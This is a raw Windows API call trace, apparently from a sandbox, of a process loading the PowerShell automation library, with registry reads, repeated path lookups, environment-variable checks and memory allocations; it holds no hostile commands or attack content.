	[0493.738] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed77c, lpData=0x0, lpcbData=0x1ed778*=0x0 | out: lpType=0x1ed77c*=0x1, lpData=0x0, lpcbData=0x1ed778*=0x56) returned 0x0
	[0493.738] CoTaskMemAlloc (cb=0x5a) returned 0x1b82f530
	[0493.738] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed74c, lpData=0x1b82f530, lpcbData=0x1ed748*=0x56 | out: lpType=0x1ed74c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed748*=0x56) returned 0x0
	[0493.738] CoTaskMemFree (pv=0x1b82f530) 
	[0493.738] RegCloseKey (hKey=0x364) returned 0x0
	[0493.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.740] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0493.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.741] CoTaskMemFree (pv=0x484300) 
	[0493.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0494.681] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0494.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.681] CoTaskMemFree (pv=0x484300) 
	[0494.687] VirtualQuery (in: lpAddress=0x1eb850, lpBuffer=0x1ec710, dwLength=0x30 | out: lpBuffer=0x1ec710*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0494.695] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0494.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.695] CoTaskMemFree (pv=0x484300) 
	[0494.696] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0494.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.696] CoTaskMemFree (pv=0x484300) 
	[0494.696] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0494.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.696] CoTaskMemFree (pv=0x484300) 
	[0494.698] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0494.698] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.698] CoTaskMemFree (pv=0x484300) 
	[0494.702] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0494.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.702] CoTaskMemFree (pv=0x484300) 
	[0494.702] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0494.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.702] CoTaskMemFree (pv=0x484300) 
	[0496.295] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0496.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.295] CoTaskMemFree (pv=0x484300) 
	[0497.756] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x484740
	[0497.758] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x484850
	[0501.206] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0501.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.206] CoTaskMemFree (pv=0x484960) 
	[0501.209] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0501.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.209] CoTaskMemFree (pv=0x484960) 
